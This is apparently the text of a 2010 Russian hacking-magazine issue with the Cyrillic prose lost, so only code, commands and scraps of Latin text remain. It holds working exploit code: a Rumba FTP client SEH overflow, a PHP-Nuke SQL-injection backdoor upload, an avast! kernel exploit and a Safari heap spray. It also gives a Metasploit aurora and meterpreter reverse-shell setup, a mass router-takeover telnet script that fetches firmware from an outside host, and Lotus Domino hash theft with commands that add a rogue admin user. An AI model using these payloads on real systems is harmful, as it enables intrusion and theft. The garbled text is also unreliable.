SOCKS-. ,
(
- : miranda, qip, pidgin
..) .
,

SOCKS-. , SimpLite
(www.secway.fr). ,
,
- ,

.
,
,
,
ICQ. OTR Off-the-Record
Messaging AES,
-
- SHA-1.

IM-
,
.
PGP .
, : .

,
AES-
Message Authentication Codes (MACs).
(

), ,
.
www.
cypherpunks.ca/otr OTR localhost AIM proxy
IM- ,
. (
, macos)
, ,
IM- ( ).

039

PC_ZONE

!

OTR




SOCKS5 (127.0.0.1:1080) HTTP-
(127.0.0.1:8080).

ICQ- OTR, Proxy
.
ICQ-
,

.
,

( OTR fingerprint)

uin-fingerprint .
fingerprint
, ,
, . , ,
, . ICQ OTR, .

, , ,
.
, ,
.
,

.

040

OTR .
Pidgin' ,
Miranda quitIM ,
Mac' IM- Adium
.
OTR
, Miranda
SecureIM,
AES192, GPG/PGP.
, Miranda GPG/
PGP ,
GnuPG Plugin (addons.miranda-im.org/details.
php?action=viewfile&id=3485).
,
.

JABBER & PGP


, ,
,

. ,
XMPP (Jabber).
, XMPP
SSL/TLS- , .
, , , PGP/
GPG.
PGP GnuPG, .

XMPP- psi (www.psiim.org).
GnuPG Pidgin
.
GnuPG
FireGPG,
,
Jabber'.

gpg --gen-key.
,
, (

OTR-
), ,
, e-mail,
. ,
.
gpg --list-keys

. ,
,
: gpg --armor --export ID_ >
mykey_gpg.asc. mykey_gpg.asc
- :
pub 1024D/29D59819 06.06.2010
myaccount's key (myaccount's key)
<myaccount@Gmail.com>
Primary key fingerprint:
586C 0FAB 3F0C 0009 40C6 273E
8885 6A80 29D5 9819
-----BEGIN PGP PUBLIC KEY BLOCK---Version: GnuPG v1.4.9 (MingW32) WinPT 1.4.3
Charset: UTF-8
mQGiBEwLWjwRBACT9pHfYBDC51cxwsIWuO
5DE7xKBz/NscI05q7j+DaVl0PoXLko
[]
D1cedORKLsgnRfbfkIMAn2BDxiBT2hPvEn
AFjHOpIWra8axQ
=l7zo
-----END PGP PUBLIC KEY BLOCK-----

- ,
.

, GUI-
WinPT (winpt.gnupt.de),
10
. ? . Psi
,
GnuPG (, -
).
,
OpenPGP
.


. , X 07 /138/ 10

PGP/GPG-

GTalk-
GPG-

SILC

, ,
, - .


Psi,
OpenPGP. WinPK .
, Psi
,
, .
, , ,
.
, , .


. X 07 /138/ 10

SILC Secure
Internet Live Conferencing (silcnet.org). SILC
IRC: , , .
, ,
, ,
IRC. IRC .
,
. : , , . SILC IRC,
( , )

. ,
, ,
. , .
,
detaching: , . IRC
- BNC :).
SILC ,
,
Linux/Unix/Mac/Windows.
Pidgin . ( ./configure&make&make install)
rpm- (rpm i silc-server-1.1-0.
fc8.i386.rpm). , , ,
:

HTTP://WWW
links


OTR:
www.cypherpunks.ca/
otr/otr-codecon.pdf

WARNING

warning

.
,
,
.

.

silcd -C /etc/silcd
--identifier="UN=<username>, HN=<hostname
or IP>, RN=<real name>, E=<email>,
O=<organization>, C=<country>"

, ,
Pidgin',
SILC.
, ,
IP ,
. ,
. ... ,
IRC, . z

041


GreenDog agrrrdog@gmail.com

Easy Hack
1

: -

:
Hack In The Box 2010 Dubai ,
Laurent Oudot,
web. conference.hitb.org/
hitbsecconf2010dxb/materials.
,
, . ,
web-hack, . , , .

. ,
( , ),
.
, , , . 100%
. ,
, , . , -

: PCAP-

:
, ,
, - . ,
, , ,
..
pcap, . tcpreplay.
(, ) pcap-
, - ,
. tcpreplay.synfin.net/wiki/Download,
*nix-. Win ,
.
. , test.pcap
- , :

:
COOKIE

:
, -
, .
, .
, - , ( -). ,

042

, POST (, ,
), ,
, GET-.
- :).
, . -, , User-Agent
Referer, . , ,
, ,
. -,
, .
GET- , , . -,
base64, , - , , - IDS.
-, ,
, , . ,
, ,
, . , , -
web-.

lanmap i eth0

lanmap eth0. lanmap.png. ,


BackTrack. tcpreplay
pcap- .
tcpreplay --intf1=eth0 test.pcap

pcap-. ,
eth0 ,
. lo. .
, pcap-.
, IP MAC-, ,
- . ...
, .

. ,
. ,
. , .
, .
open-labs.org/ob-session04.tar.gz ( ).
, :
perl getcookie.pl http://example.com USERID 100 > test1.txt

getcookie.pl ;
X 07 /138/ 10

http://example.com
-; USERID
, test1.txt,
; 100

.

:
perl ob-session.pl < test1.txt


, , ..
, -
fuzzer,
.
, ob-session.pl ,
.

PHP- ()

:
.
- Windows, ,
, , , , , . .
Metasploit.
. ,
,
, ,
, . ,
, .
dns-spoofing. DNS-. ,
DNS-,
IP-.
IP- .
arp-spoofing,
, DNS-.
arp-spoofing , .
arpspoof -i eth0 192.168.0.1,

192.168.0.1 IP , MAC .
echo 1 > /proc/sys/net/ipv4/ip_forward

.
X 07 /138/ 10

DNS-spoofing. Metasploit fake dns, ,


Digininja, : digininja.
org/metasploit/dns_dhcp.php ( ). ,
, dns.
txt, DNS.
.
:
1.
2. dns_mitm auxiliary/server metasploite

lib dhcp_exhaustion, .
msfconsole.
use
set
set
run

auxiliary/server/dns_mitm/dns_mitm
FILENAME /msf3/modules/auxiliary/server/dns.txt
REALDNS 192.168.0.1
-j

, :
dns.txt IP DNS- .
, Windows ,
Metaspoit, MSF Cygwine. ,
C .
dns.txt :
192.168.0.1 google.ru

192.168.0.1 IP , google.com ,
, .
, .
DNS- . ,
:

043

nslookup digininja.reload 192.168.0.101

192.168.0.101 IP DNS, digininja.reload


dns.txt ( RELOAD MSF).
. .
. meterpreter. , .
.
use exploit/windows/browser/ms10_002_aurora

: GOOGLE-
-

:
Google ( ) , ,
.
.

.
, , .
ghh.sourceforge.net , ,
. , ,
:
1. ;
2. config.php ,
, htdocs ( Apache);
3. , readme.txt, -
htdocs;

set PAYLOAD windows/meterpreter/reverse_tcp


set LPORT 4444
set LHOST 192.168.0.101
set SRVPORT 80
set URIPATH /
exploit

-, . google.ru, ,
.

4. config.php ;
5. RegisterGlobals php.ini, ;
6. -
, , : <a href=http://example.com/
honeypot.php>.</a>, ;
7. index.php config.php
, .

. , .
, , -
, . ,
, - ,
.
, MySQL XMLRPC,
.
,
, ,
hackersforcharity.org/ghdb/.
, .. ,
Google Hacking for Penetration Testers by Johnny Long.

044

X 07 /138/ 10

:
, , . . ,
php glype-
, , .

: /

][
. Olly Debugger
. ,
. Immunity Debugger. , ,
Ollydbg 1.10.
Pythona , .
1.73 ( 1.74 -
- ). ,
, Python . .
Peter Van Eeckhoutte aka corelanc0d3r
ImmunityDbg pvefindaddr.
, www.corelan.be:8800/index.php/security/pvefindaddrpy-immunity-debugger-pycommand. 1.32.
:
1. pvefindaddr.py;
2. ImmunityDbg PyCommands.

ImmunityDbg.
!pvefindaddr, (L)oga .
, . .
:
!pvefindaddr j esp user32.dll

jmp, call, push+ret .. user32.dll j.txt.

, ,
example.com:22, 22 . , ,
couldnt connect to host, , .
www2.de.com/index.php.
, , ,
. , -
, ,
sensepost.co.za/labs/tools/pentest/glype. , glype- , GHDB.

offset
.



ActiveX

][ . ESP


ComRaider.
Metasploit.
!pvefindaddr pattern_create 500

SubmintToExpress
arg1="Aa0Aa1AAq3Aq4Aq5Aq"

. ESI 37694136, SEH 6B41316B.


:
!pvefindaddr pattern_offset 37694136 500
!pvefindaddr pattern_offset 6B41316B 500

ESI 260 , SEH 304.


ASLR DEPa:
!pvefindaddr noaslr

dll, ,
. , ,
. z

offset pvefindaddr

X 07 /138/ 10

045


, Digital Security dookie@inbox.ru


,
, ,
. - .
, , , ,
.
. , , :
MKD c:\zloba
257 "c:\zloba" directory created

, ,
. .

SOLUTION
. WFTPD FTP.
, .

02

RUMBA
FTP CLIENT

CVE
N/A

01

WFTPD SERVER

CVE
N/A

TARGETS]
* Rumba FTP Client 4.2

BRIEF
, FTP-,
FTP-.
.

TARGETS
*WFTPD Server 3.30

BRIEF
WFTPD Server FTP- Windows (, ).
. FTP-
Cisco, HTC, Serv-U .

.

EXPLOIT
FTP- , , . ,
. ,
../ .

EXPLOIT
FTP-,
, . , , - (
, ,
$pasvip) , . , SEH-
. ,
, SEH-, .
-, . :
use warnings;
use strict;
use IO::Socket;
my $sock = IO::Socket::INET->new( LocalPort => '21', Proto

MKD ../../../../../ZLOBA
550 You do not have rights to create that subdirectory.

046

=> 'tcp', Listen => '1' )


or die "Socket Not Created $!\n";
X 07 /138/ 10

FTP-, .

# ,

if (/LIST/i) {

print

print $data "150 Here comes the directory listing.\r\n"

"################################################\n"
."#

Rumba ftp Client 4.2 PASV BoF (SEH)

."#

By: zombiefx

."#

#\n"

. "226 Directory send OK.\r\n";

#\n"

Listening on port 21 with pasv port of 31337

&senddata( '122', '105' );

#\n"

."################################################\n";

}
}
print "Payload delivered check the client!\n";

# IP

my $pasvip = "127,0,0,1";
#
while ( my $data = $sock->accept() ) {

print "Client Connected!\nAwaiting Ftp commands: \n";


print $data "220 Gangsta Rap Made Me Do It\r\n";

sub senddata {
my $port

= $_[0] * 256 + $_[1];

#
my $pasvsock = IO::Socket::INET->new( LocalPort =>

# FTP

$port, Proto => 'tcp', Listen => '1' );

while (<$data>) {

my $pasvdata = $pasvsock->accept();

print;
print $data "331 Anonymous access allowed\r\n" if (/

# 1351
my $junk

USER/i);
print $data "230-Welcome to N0 M4Ns l4nd.\r\n230 User

= "\x77" x 1351;

# SEH- 0x1006E534
# ftplogic.dll ,

logged in.\r\n" if (/PASS/i);


print $data "215 UNIX Type: L8 \r\n" if (/SYST/i);

#POP EDI/POP ESI/RETN

print $data "257 \"/\" is current directory.\r\n" if (/

#
my $seh = pack( 'V', 0x1006E534 );# located in ftplogic.

PWD/i);
print $data "200 Type set to I.\r\n"

if (/TYPE I/i);

dll

print $data "200 Type set to A.\r\n"

if (/TYPE A/i);

# JMP +0x8,

print $data "214 Syntax: SITE - (site-specific commands)\


r\n"
if (/HELP/i);
#
print $data "227 Entering Passive Mode ($pasvip,122,105)\
r\n"

#
my $nseh = "\xeb\x06\x90\x90";
#, NOP - :
my $nops = "\x90" x 50;
my $calcshell = /* */;

if (/PASV/i);
X 07 /138/ 10

047

, .
? , , .
:
"c:\Program Files\PHP\php.exe" nuke.php -t
http://<target_site>

PHP-Nuke -
, cookie:
"c:\Program Files\PHP\php.exe" nuke.php -t
http://<target_site> -c user=MjphZG1pbjo1ZjRkY2MzYjV
hYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6ND
A5Ng==

.
my $payload = $junk . $nseh . $seh . $nops . $calcshell;
print $pasvdata
"-rw-rw-r--

1 1176

1176

1060 Apr 23 23:17


, .. .
, .
, ,
referer:

test.$payload\r\n\r\n";

REFERER: '=(select if(true,sleep(10),0) from nuke_


authors limit 1))-- 1

, , , DEP
.

SOLUTION
, , .
...

03


PHPNUKE

CVE
N/A

TARGETS
* PHP-Nuke 7.0
* PHP-Nuke 8.1
* PHP-Nuke 8.1.35

BRIEF
PHP-Nuke . ,
. (Michael Brooks) , , LFI, SQL-,
, , .
, , phpBB, PHP-Nuke 7.0.
PHP
, - ,

-, .

EXPLOIT
, , . ,
, . PHP-Nuke

048

cookie ,
, ,
LFI-. , , ( )
.
, AppArmor
Ubuntu.
:
print "Uploading backdoor...\n";
$remote_path=addslashes(addslashes($remote_path."\\
frontend.php"));
$backdoor='get_magic_quotes_gpc()?eval(stripslashes($_
GET["e"])):eval($_GET["e"])';
$http->postdata="chng_uid=".urlencode("' union/**/
select ".$sex->charEncode("<?php").",'".$backdoor."',".$
sex->charEncode("?>").
",'','','','','','','','','','','','','','','' into
outfile '".$remote_path."'-- 1");
$re=$http->send($attack_url."/admin.php?op=modifyUser");
$http->postdata="xsitename=".$values[0]."&xnukeurl=".$
values[1]."&xslogan=".$values[2]."&xstartdate=".$value
s[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_
editor=1&xdisplay_errors=0&op=savegeneral";
$error_reporting=$http->send($attack_url."/admin.php");

charEncode () char()
MySQL. , .
:
$http->postdata="xDefault_Theme=../../../../../../../../
../../../tmp&xoverwrite_theme=0&op=savethemes";
$http->send($attack_url."/admin.php");

/tmp AppArmor.

X 07 /138/ 10

mov


Safari.

SOLUTION
, PHP-Nuke, , , .

04

AVAST!

CVE
CVE-2008-1625

TARGETS
* avast! 4.7 Professional Edition
* avast! 4.7 Home Edition

BRIEF
(Matteo Memelli) Offensive-Security
avast!. , (Tobias Klein), ,
IOCTL-.
, ,
. , .

EXPLOIT
, , ,
:). aavmker4.sys. , IOCTL , , IOCTL
0xb2d60030, :
mov
ecx, 21Ah ;
mov
edi, [eax+18h] ; EAX+0x18 ,

rep movsd ; EDI,

,
.
-,
. , EAX
.
X 07 /138/ 10

eax, [ebp+v38_uc]

, .
, ,
, EAX+0x18
.
.data, IOCTL- 0xb2d6001c. ,
, IOCTL 0xb2d60030,
,
.data . IOCTL 0xb2d60020. ,
syscall.
:
lsas1 = "echo hola | runas /user:administrator cmd.exe
> NUL"
lsas2 = "net use \\\\127.0.0.1 /user:administrator
test > NUL"
. . .
os.system(lsas1)
time.sleep(1)
os.system(lsas2)

- - . 4444, .
:
#, ,
# IOCTL-
read_data_from= struct.pack('L', sysbase+0x2e04)
# , , NOP
r0_address
= struct.pack('L', sysbase+0x23fa)
#
#
# IOCTL 0xb2d6003
# -, NOP,
evil_input
= r0_address*2 + "\x90"*0x102
#- , ring3
4444
evil_input += ring0_migrate + ring0_msr + ring3_
stager + ring3_shellcode
#
evil_input += "\x41"*0x549
# .data ,

# IOCTL
evil_input += read_data_from + "\x42\x42\x42\x42"
# ,
.data
#c IOCTL-.
# IOCTL
#
stor_input
= "\x43\x43\x43\x43"
# , ,
# IOCTL
stor_input += "\x07\xAD\xDE\xD0" # cmp dword ptr
[eax], 0D0DEAD07h
stor_input += "\xBA\xD0\xBA\x10" # cmp dword ptr
[eax+4], 10BAD0BAh
#
stor_input += "\x44\x44\x44\x44"*2

049

, .

# nt!KeSetEvent,

#,

#
stor_input += read_data_from
#
stor_input += "\x44\x44\x44\x44"
# 0x2300
# ,
# IOCTL
#
#
stor_input += struct.pack('L', sysbase+0x2300) + "\
x45"*414

.
, IOCTL-. read_data_from, stor_input.
- read_data_from, evil_input.
dev_ioctl = kernel32.DeviceIoControl(driver_handle1,
0xb2d6001c, stor_input,
stor_size, stor_output, out_size,
byref(dwReturn1), None)
dev_ioctl = kernel32.DeviceIoControl(driver_handle1,
0xb2d60030,
evil_input, evil_size, evil_
output,
evil_size,
byref(dwReturn2), None)

050
50

IOCTL- 0xb2d60020
syscall c lsass.exe. , - , lsass.exe .

SOLUTION
4.8
.

05


APPLE SAFARI

CVE
N/A

TARGETS
* Apple Safari <= 4.0.5
BRIEF
0day Safari.
(Krystian Kloskowski) . Apple .

EXPLOIT
HTML- c
JavaScript-. parent.close(),
,
-.
- , ,
- . ,
.
window.
X 07 /138/ 10

open(), HTML .
, . ,
close() ,
prompt()
. parent- ,
Safari ,
,
prompt()
ESI ,
.

CALL ESI.
close()
prompt(), ESI
0x40E00000. -,
0x40E00000.
heap
spray, ,
0x40E00000, -.
, ,
, prompt(),
ALT+F4,
, ,
pwned close()
,
prompt().
:

, permanent-DEP.
, - ,
DEP ASLR. ,
VUPEN
(, ROP),
ASLR ( ),
JIT-SPRAY
,
(
:)). .
, heap spray
(, , ) JIT-SPRAY. ,
. -
,
parent.close() ,
Flash, .
.
JIT-SPRAY
,
, . , heap

spray. Safari
, .
0x40E00000 ,
JIT SPRAY ][, ,
0xXXYY0101, JIT-.
,
, ESI ,
parent().
var buf = make_
buf(unescape('%u0101%u0943'),
38000);


. 0x09430101.
. .

SOLUTION
.
JavaScript- Pop-Up (
Safari ). z

//
function make_buf(payload, len) {
while(payload.length < (
len * 2)) payload += payload;
payload = payload.substring(
0, len);
return payload;
}
var shellcode = // -

/* heap spray */
var a = parent; //
var buf = make_buf("AAAA", 10000);
//
for(var i = 0; i <= 1; i++) { //,

a.prompt(alert);
a.prompt(buf);
a.close();
}

, Safari
permanent-DEP,
. VUPEN
X 07 /138/ 10

051


HellMilitia and my Death

D-LINK 500T
, ! ADSL-
.

. ,
, .
IQ

, ,
GNU\Linux,

.
Windows ( Cygwin, ), .

( ).

...

- . , ,
, ,
.
, (, -
:)), Web- , ,
telnet ssh.
(
, , admin:admin). ,
SSH, !
$ ssh admin@192.168.1.1
$ Password:

! BusyBox! ,
, GNU/Linux!
, , ,
, .

052

, ? , :
# busybox
...
Currently defined functions:
[, ash, busybox, cat, chgrp, chmod,
chown, cp, date, dd, df, echo, false, free,
grep, hostname, id, ifconfig, init, insmod,
kill, ln, login, ls, lsmod, mkdir, modprobe,
mount, mv, passwd, ping, ps, pwd, reboot,
rm, rmmod, route, sh, sleep, sync, tar,
test, tftp, touch, true, tty, umount, wget,
whoami, yes

,
. :
# cat /proc/version
Linux version 2.4.17_mvl21-malta-mips_fp_le (root@xy)
(gcc version 2.95.3
20010315 (release/MontaVista)) #1 Thu Dec 28 05:45:00
CST 2006

: MontaVista , .
.
X 07 /138/ 10

FTP-
adam2
, ,
.
:
# cat /etc/versions
CUSTOMER=DLinkRU
MODEL=DSL-500T
VERSION=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BOARD=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253
# cat /proc/cpuinfo
processor
cpu model
BogoMIPS
wait instruction
microsecond timers
extra interrupt vector
hardware watchpoint
VCED exceptions
VCEI exceptions

:
:
:
:
:
:
:
:
:

0
MIPS 4KEc V4.8
149.91
no
yes
yes
yes
not available
not available

AR7 ,
TexasInstruments. ADSL-
, ADSL1, ADSL2,ADSL2+.
RISC MIPS 4KEc,
175 233 ( : 18
13 ). 2 UART-,
(UART_A) ,
EJTAG-, () Flash-.
.
:
# cat /proc/mounts
/dev/mtdblock/0 / squashfs ro 0 0
none /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0
# cat
dev:
mtd0:
mtd1:
mtd2:

/proc/mtd
size
erasesize name
0034f000 00010000 "mtd0"
00090f70 00010000 "mtd1"
00010000 00002000 "mtd2"

X 07 /138/ 10

- AR7

mtd3: 00010000 00010000 "mtd3"


mtd4: 003e0000 00010000 "mtd4"

, :
# cat /proc/ticfg/env | grep mtd
mtd0
0x900a1000,0x903f0000
mtd1
0x90010090,0x900a1000
mtd2
0x90000000,0x90010000
mtd3
0x903f0000,0x90400000
mtd4
0x90010000,0x903f0000

, Flash- (/dev/mtdblock)
5 :
mtd0 SquashFs.
, . gzip, LZMA
( ). 4 .
mtd1 MontaVista LZMA
, 600 .
mtd2 Bootloader ADAM2, , FTP- .
. 64 .
mtd3 environment ( ) , /proc/ticfg/
env. /etc/config.xml.
( cm_*, , ) cm_logic.
64 .
mtd4 , .
Web-. ,
, ,
.
( 16 , ADAM2
14 , ), /var,
:
# free
total
Mem:

used
14276

free
10452

shared
3824

buffers
0

.
: thttpd Web-server; dproxy, DNS
proxy server; ddnsd DNS daemon; pppd...
daemon, PPP, -

053

, POST- Web-
, Flash-, .
,
.

D-Link ( , GNU/
Linux) GPL,
FTP-.
, ( T-).
, ,
toolchain / .
PATH
bin- toolchain`a:
$ tar xvf tools.tgz
$ export PATH=$PATH:/opt/<toolchain_path>

, ,
make.

Nmap


. ,
( bridge),
.
cm_*
(
TexasInstruments, D-Link
).
cm_logic ,
; /etc/config.
xml /dev/ticfg (
mtd3).
cm_cli
. ,
.
cm_pc , (, ,
) /etc/progdefs.xml;
.
webcm CGI-, , /etc/
shadow, URL.
http://192.168.1.1/../../../etc/shadow

$ cd DSL/TYLinuxV3/src && make


( ).
TYLinuxV3/images .
, /
TYLinuxV3/src/scripts.
.
,
SSH, scp.
, mc (Midnight Commander) SSH (Panel Shell connection). ,
Web- FTP-. Web-, . thttpd,
, .
, /var (,
, ).

$ thttpd -g -d ~/ForRouter -u user -p 8080


# cd /var
# wget http://192.168.1.2/file

, web-:
# thttpd -g -d /var -u root -p 8080

, ,
.
mc, /var ,
. , ,
, .

, , HelloWorld.
- . :

, thttpd , :
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

. ,
ssh/telnet, Web-.
firmwarecfg Web-.

054

#include <stdio.h>
#include <stdlib.h>
int main(void)
{
printf("Mate.Feed.Kill.Repeat.");
X 07 /138/ 10

JTAG

JTAG

return 0;
}

( toolchain'
PATH):
$ mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-strip -s hell

<name>hell</name>
<path>/bin/hell</
name>
</program>

JTAG-

$ mksquashfs unpacked_fs my_fs.img -noappend

, /var,
:
# cd /var
# chmod +x hell
# ./hell

... , path
not found. ? cm_pc
, /etc/progdefs.xml.
.

, ,
. ,
SquashFs LZMA. mksquashfs (
), unsquashfs ( ) .
, ,
. LZMA-
, . :

,
.
- , , - grep,
whoami,
UPX.
.

,
/dev/mtdblock/*. ,

:
# cat my_fs.img > /dev/mtdblock/0 && reboot

# cp my_fs.img /dev/mtdblock/0 && reboot

, ,
, .
:

HTTP://WWW
links
,
MIPS ADAM-:
ftp.dlink.ru/pub/
ADSL/GPL_source_
code/
sensi.org/%7Ealec/
mips/adam2_app.tgz
langens.eu/tim/ea/
mips_en.php
mrc.uidaho.edu/
mrc/people/jff/digital/
MIPSir.html
mips.com/products/
processors/hard-ipcores/4kec-hard-ipcores/
routertech.org5

# cat /dev/mtdblock/0 > /var/fs.img

.
, :

# hell
Mate.Feed.Kill.Repeat.

! . .
$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs

,
FuckTheWorld /bin /etc/progdefs.xml.
$ cp hello unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml

( <progdefs></progdefs>):
<program>
X 07 /138/ 10

,
, .
. ADAM2
FTP-. FTP-
IP- ADAM2, /proc/ticfg/
env ( my_ipaddress).
reset,
.
$ ftp 192.168.1.199

055

UART-
220 ADAM2 FTP Server ready.
530 Please login with USER and PASS.

, FTP:
ftp> debug

/ adam2/adam2. .
FTP :
ftp> bin

Flash- :
ftp> quote MEDIA FLSH

, ,
:
ftp> put fs.img "fs.img mtd0"

, , :
ftp> quote REBOOT
ftp> quit

! , , - ,
.
, IP-, ( reset' )
.
, FTP
ADAM2: GETENV SETENV ( ). FTP :
ftp>
ftp>
ftp>
ftp>
ftp>

SETENV autoload,1
SETENV autoload_timeout,8
SETENV my_ipaddress,192.168.1.1
quote REBOOT
quit

ADAM2 192.168.1.1:21.
, , FTP .
.
, /proc/ticfg/env,
FTP.
# echo my_ipaddress 192.168.1.1 > proc/ticfg/env

:
# cat /proc/ticfg/env | grep my_ipaddress
, ,
? -

056

UART-
, ADAM2? JTAG, ,
EJTAG ( ).
\.
LPT- , 4 . .
, JTAG ,
.
, .
JTAG ,
UrJTAG. . :
jtag> cable parallel 0x378 DLC5
jtag> detect

Flash-:
jtag> detectflash 0x30000000 1

Flash-:
jtag> readmem 0x30000000 0x400000 fullflash.img

():
jtag> flashmem 0x30000000 adam2.img

UART- ( ). UART_A , (
) .
. UART Universal
Asynchronous Receiver/Transmitter (
) .
. TTL: MAX232 COM FT232R
USB.
.
( COM-) 20 .
, .
? USB-
, UART USB.
X 07 /138/ 10

Webcm
telnet.write("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget " + SERVER)
telnet.read_until("#")
telnet.write("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write("reboot")
telnet.close()


progdefs.xml vim.

\ . , ,
.
Windows, :). .
?
, /.
DDOS- .
/ , mtd-
, !
,
. ,
/ ... . , ,
Flash- ( ), .
! Qemu AR7! ,
?
- !
. , 1-2 , , ,
10- ,
"cat" "mtd".
. python.
:
, , nmap;
IP-,
telnet \;
: ,
, .
#!/usr/bin/env python
#Encode=UTF-8
import telnetlib,time
SERVER="http://anyhost.com/fs.image"
for addr in open("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("login:")
time.sleep(5)
telnet.write("admin\n")
telnet.read_until("Password:")
X 07 /138/ 10

, ,
. /
, . ,

, ,
. ,
/ ,
. , ,
, ,
RDP .
.
Windows,
( )
, .
: ,
, ... , .
.

, : ? , , . ( 8 ),
(hex-, , , ), nmap
.
, .
progdefs.xml. telnet ( , , ),
firewall,
IP- MAC-. firewall
, .
.

, D-Link- AR7, Acorp, NetGear, Linksys, Actionec...


AR7 MontaVista. , ,
toolchain, , .
: / ( , , ). , , , / ...
USB 1.1-,
. USB- ,
Flash-
. ,
, ! z

057


sh2kerr dsecrg.ru

LOTUS DOMINO

. Oracle
,
Lotus Domino. Domino - ,
, , LDAP, , .

IBM Lotus Domino Server Lotus,



,
.
: , HTTP- .
HTTP-,
.
Lotus Domino 8.5.1
Windows.

058

, Web- Lotus (Lotus


Domino httpd) Nmap
:
Nmap sV 172.212.13.0.24 p 80
Nmap scan report for 172.212.13.13
Host is up (0.017s latency).
Not shown: 65533 filtered ports
X 07 /138/ 10

Lotus
Domino

PORT
80/tcp

STATE SERVICE VERSION


open http
Lotus Domino httpd

,
Lotus, . ,
, Lotus Domino httpd,
: http://servername/homepage.nsf.
, ,
, , .
Google Hack
Lotus- ,
inurl:homepage.nsf.

Lotus. ,
,

,
.

, .
Lotus-
,
. ,

,
. ,
?

.NSF

, Lotus nsf.

. , nsf

. , nsf-
, ,
.
nsf-,
:
/names.nsf
/admin4.nsf
/admin.nsf
/alog.nsf
/domlog.nsf
/catalog.nsf
X 07 /138/ 10

/certlog.nsf
/dba4.nsf
/homepage.nsf
/log.nsf

, , , dominohunter,
nsf-. , ,
names.nsf.

,
, :
, Lotus
Notes . , ?
!

, ,
. .
1. ,
. ,
, , ,
.
2. ,
,
, ,
.
3. , names.nsf

Lotus Notes, .
0-
. , IE (
) PDF ,
Lotus Notes,
ActiveX- ( , inotes.
dll xforce.iss.net/xforce/xfdb/11339),
.

WARNING
warning
!


!
,



!


, names.nsf.
2005
,
.

059

Live console

Webadmin.nsf

.
. Hidden HTTPPassword
dspHTTPPassword ( ),
, ,
. ,
!

, .
, .
2007 raptor_dominohash,
, ,
DominoHashBreaker, .
,
,
. ,
,
,
. ,
JohnTheRipper jumbo,
,
, DominoHashBreaker.
, , Lotus :
1. (32 HEX) :

ActiveX
:
:
.
.
:

:
<input name="$dspPasswordDigest" type="hidden"
="F05389C37C850260F278FED23334C172">

value

2. C (22
G) :
<input name="$dspHTTPPassword" type="hidden"
value="(GFmjA4YmP9C05vHn09gI)">


JohnTheRipper HASH.txt :

./john HASH.txt --format=lotus5


JohnTheRipper HASH2.txt :
:()
:()
.
.
:()

060

X 07 /138/ 10

HTTP://WWW
links
dsecrg.ru/pages/
pub/

names nsf

./john HASH.txt --format=dominosec

, , ,
. , ,
Domino ,
Lotus Domino Web-.
, ,
- ,
.

, , ( , :))
.

nsf-, , , . log.nsf,

, , . catalog.
nsf. ,
/mail/.nsf.

webadmin.nsf (servername/webadmin.nsf). Web- Lotus Domino
. , ,
,

.
Lotus Domino ,
, : ( ) (
). , Windows

Local System, Local
System, Unix .
, webadmin.nsf?

,
.
: Quick Console
Live Console. - .
, ,
LOTUS.
, -
X 07 /138/ 10

, , Load
,
. ,
PATH
Load (
, IBM Lotus Notes/
Domino R7, , Lotus).
.

LIVE CONSOLE


Live Console, , , .
,
,
.

2050,
.
, ,
.

QUICK CONSOLE


Quick Console.
, ,
.
, ,

.
Blind SQL Injection, , .

cybsec.com/vuln/
default_configuration_
information_disclosure_lotus_domino.
pdf
Lotus Domono.
exploit-db.com/
exploits/3302

.
securiteinfo.com/
download/dhb.zip


Domino Hash Breaker.
openwall.com/
john/
JohnTheRipper
.
openwall.com/
john/contrib/john1.7.5-jumbo-2.diff.gz

JohnTheRipper

Domino
.
documents.iss.net/
whitepapers/domino.
pdf IBM ISS Lotus
Domino Security 2002
seclists.org/pentest/2008/May/64
Pentesting Lotus
Domino.

,
, ,
. ,
Files, ,
, , . ,
.
.nsf.
,

,
, .nsf.

061


.
(
):
load cmd /c "dir /D /B > sh2kerr.out"
load cmd /c "FOR /F "delims= " %i IN (sh2kerr.out) DO
ECHO > C:\lotus\domino\sh2kerr\"%i".nsf"

(
DIR) sh2kerr.out.
.
C:\lotus\domino\sh2kerr\ ,
.
, , , .
,
. , ,
Web-.
6.5 8.5 ( , ,
, ). Windows
:
C:\Lotus\Domino\data\domino\html\download\filesets\

, Web, : http://
servername/download/filesets. Lotus.
.
Load . Server->
Status->Schedules->Programs. ,
.

Web- Lotus Domino, (NRPC 1352 ),


.
Lotus Domino , Lotus Designer (), Lotus Notes ( )
Lotus Administrator (, ).
, Lotus Domino
ID.
.

062


ID-, . , ,
, 2 : ID- . ,
Web, .
, ID-, Lotus Domino.
ID- ,
, . ,
names.nsf, .
ID-
names.nsf. , Web-, ID-.
, ?
. ID-, , ,
, , 3-
(smashingpasswords.com/3-best-lotus-notes-password-recovery-freesoftwares), (IPR) .

STEP BY STEP HOWTO

, Lotus Domino.
:
Web-:
1. raptor_dominohash :
./raptor_dominohash 192.168.0.202
2. , ;
3. JohnTheRipper :
./john HASH.txt --format=lotus5
4.
Web- :
http://servername/webadmin.nsf
5. Quick Console ,
:
load cmd /c net user hacker iamstupid /add
6. , , :
load cmd /c net user > C:\Lotus\Domino\data\domino\html\download\
filesets\1.txt

:
http://servername/download/filesets/1.txt , , ,
;
7. , Program.
NRPC-:
1. names.nsf ( ) ID;
2. ID
;
3. Lotus
Administrator, 5 .


Lotus
Domino. , : ID-,
nsf- xss Web-,
, ,
.
, , DSecRG.ru, ,
, (research@dsec.ru). z
X 07 /138/ 10


Positive Technologies

MOD_REWRITE


...
, MOD_REWRITE
C , ,
Apache mod_rewrite.
- ,
SQL Injection, Cross-Site Scripting ..
, , fingerprint-
. , mod_rewrite
, ,
. , , ,
!
064

X 07 /138/ 10

Mod_rewrite URL . -
Apache .
:
(SEO);
, ;
, -
;
: mod_rewrite
